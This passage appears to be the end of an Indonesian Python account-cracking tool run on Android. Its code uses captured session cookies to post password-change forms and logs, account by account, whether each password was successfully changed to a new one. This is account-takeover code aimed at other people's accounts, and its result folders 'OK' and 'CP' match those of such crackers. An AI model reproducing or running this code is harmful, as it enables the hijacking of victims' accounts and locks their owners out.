                     posh = ses.post(f'https://{url}' + find, data=data, cookies = {'cookie':coki})
                     if 'Kata Sandi Telah Diubah' in posh.text:
                          noexx('\r %s*  --> Berhasil mengganti password akun : %s menjadi %s'%(H,user,password_new))
                     else:
                          noexx('\r %s*  --> Gagal mengganti password akun : %s menjadi %s'%(M,user,password_new))
             except Exception as e:print('\r %s*  --> Gagal mengubah password akun : %s'%(M,user))

if __name__ == "__main__":
    try:os.mkdir('/sdcard/noe999x/OK')
    except:pass
    try:os.mkdir('/sdcard/noe999x/CP')
    except:pass
    try:os.mkdir("/sdcard/noe999x")
    except:pass
    os.system('git pull')
    menu()